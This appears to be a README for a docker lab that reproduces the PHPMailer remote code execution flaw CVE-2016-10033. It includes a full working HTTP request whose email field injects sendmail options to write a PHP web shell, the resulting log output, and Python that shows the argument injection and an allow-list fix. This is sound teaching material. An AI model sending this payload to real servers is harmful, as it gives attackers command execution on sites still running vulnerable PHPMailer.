PHPMailer < 5.2.18 Remote Code Execution Vulnerability(CVE-2016-10033)

Introduction

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a crafted Sender property. The key reason is that validateAddress can be bypassed and the parameters are not escaped properly before being passed to mail().

Usage

Run

docker-compose up

Send the following request to http://localhost:8080/poc.php, or use the PoC from opsxcq (see Reference):

POST /poc.php HTTP/1.1
Host: 10.128.154.152:8080
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.128.154.152:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzkrsSDcWISQlIkAI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.128.154.152:8080/poc.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="action"

submit
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="name"

sdf
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="email"

"<?system($_GET['x']);?>". -OQueueDirectory=/tmp/. -X/var/www/html/shell.php @a.com
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="message"

sadf
------WebKitFormBoundaryzkrsSDcWISQlIkAI--

A shell.php with the content below will be created in /var/www/html:

...
00167 >>> Content-Type: message/rfc822
00167 >>> 
00167 >>> Return-Path: <\<\?system\($_GET\[\'x\'\]\)\;\?\>.>
00167 >>> Received: (from www-data@localhost)
00167 >>> 	by 72799d950c3c (8.15.2/8.15.2/Submit) id 2366KMQh000167
00167 >>> 	for @a.com; Wed, 6 Apr 2022 06:20:22 GMT
00167 >>> X-Authentication-Warning: 72799d950c3c: www-data set sender to \<\?system\($_GET\[\'x\'\]\)\;\?\>. using -f
00167 >>> X-Authentication-Warning: 72799d950c3c: Processed from queue /tmp/.
00167 >>> To: attacker <[email protected]>
00167 >>> Subject: subject
00167 >>> Date: Wed, 6 Apr 2022 06:18:22 +0000
00167 >>> From: Vuln Server <"<?system($_GET['x']);?>".-OQueueDirectory=/tmp/.-X/var/www/html/[email protected]>
00167 >>> Message-ID: <[email protected]>
00167 >>> X-Mailer: PHPMailer 5.2.17 (https://github.com/PHPMailer/PHPMailer)
00167 >>> MIME-Version: 1.0
00167 >>> Content-Type: multipart/alternative;
00167 >>> 	boundary="b1_89080c2ed839d99c55a8b6550eac7aaa"
00167 >>> Content-Transfer-Encoding: 8bit
...
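As an added illustration that is not part of this repository, the Python below approximates how the shell splits the -f<Sender> extra parameter that PHPMailer 5.2.17 builds for mail(), using the "email" field from the PoC request above, and shows the allow-list check a sender value should pass before reaching mail(). The function names sendmail_argv, injected_options and is_shell_safe_sender are chosen here; the allow-list is modelled on the isShellSafe() check added in later PHPMailer 5.2.x releases.

```python
import re
import shlex

# Constructed inputs: the "email" field from the PoC request above, which PHPMailer
# 5.2.17 handed to mail() as sprintf('-f%s', $this->Sender), and an ordinary address.
POC_SENDER = "\"<?system($_GET['x']);?>\". -OQueueDirectory=/tmp/. -X/var/www/html/shell.php @a.com"
SAFE_SENDER = "alice.smith-01@example.com"

# Allow-list of characters with no meaning in common shells (alphanumerics plus @ _ - .),
# modelled on the isShellSafe() check that later PHPMailer 5.2.x releases apply to Sender.
SAFE_CHARS = re.compile(r"[A-Za-z0-9@_.-]+")


def sendmail_argv(sender: str) -> list:
    """Approximate the argv the shell builds when PHP's mail() runs the default
    sendmail_path ('/usr/sbin/sendmail -t -i') with the extra -f parameter.
    PHP's escapeshellcmd() does not escape spaces, so word splitting is what matters."""
    return shlex.split("/usr/sbin/sendmail -t -i -f" + sender)


def injected_options(sender: str) -> list:
    """Return the sendmail options that the sender value smuggled in after the -f token."""
    argv = sendmail_argv(sender)
    f_index = next(i for i, a in enumerate(argv) if a.startswith("-f"))
    return [a for a in argv[f_index + 1:] if a.startswith("-")]


def is_shell_safe_sender(sender: str) -> bool:
    """Reject any Sender containing characters outside the allow-list. This gate is
    needed in addition to RFC 5322 address validation, which permits quoted local
    parts and whitespace that validateAddress() accepted in 5.2.17."""
    return SAFE_CHARS.fullmatch(sender) is not None


if __name__ == "__main__":
    for label, sender in (("poc", POC_SENDER), ("safe", SAFE_SENDER)):
        print(label, "shell-safe:", is_shell_safe_sender(sender),
              "injected options:", injected_options(sender))
```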

Reference

https://github.com/opsxcq/exploit-CVE-2016-10033